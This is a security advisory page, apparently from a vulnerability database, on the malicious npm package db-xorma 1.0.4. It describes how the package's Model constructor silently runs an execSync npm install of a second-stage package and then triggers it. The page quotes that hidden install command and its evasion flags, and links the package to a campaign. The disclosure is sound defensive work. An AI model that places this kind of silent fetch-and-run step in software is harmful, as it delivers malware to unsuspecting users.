VDB

GCVE-110-OSM-2026-6451

GCVE-110-OSM-2026-6451
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published June 21, 2026
Drops a malicious stage-2 package onto victim systems at require-time by silently running execSync npm install db-dx-connector on every new Model() instantiation and then triggering the payload via db.queryDBConnect(). Stage-1 dropper in a dependency-chain staging attack; campaign clone of db-plog with identical code template and author impersonation of Austin Malerba; stage-2 capabilities unknown pending analysis of db-dx-connector. **Trigger**: require-time — `Model.resetor()` is called from the Model constructor on every `new Model()` instantiation (no install hook). **Stage-2 install**: `execSync('npm install db-dx-connector --no-warnings --no-save --no-progress --loglevel silent', { windowsHide: true })` silently installs the campaign stage-2 package if not already present. **Stage-2 load**: `require('db-dx-connector')` loads the payload; `db.queryDBConnect()` triggers it. **Evasion**: `windowsHide: true`, `--loglevel silent`, `--no-save` suppress install visibility; no install hook avoids postinstall scanners. **Campaign**: Identical code structure and commented-out `execSync('npm uninstall clsx-js && npm install clsx-js')` fragment as db-plog (retefuente001@gmail.com); publisher venussirve@proton.me; impersonates Austin Malerba. **Stage-2 capabilities**: Unknown — db-dx-connector not analyzed at time of this report.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowndb-xorma1.0.4 (affected)

References

vendor

Browse GCVE Records

73,834 records in the GCVE database · Updated July 19, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›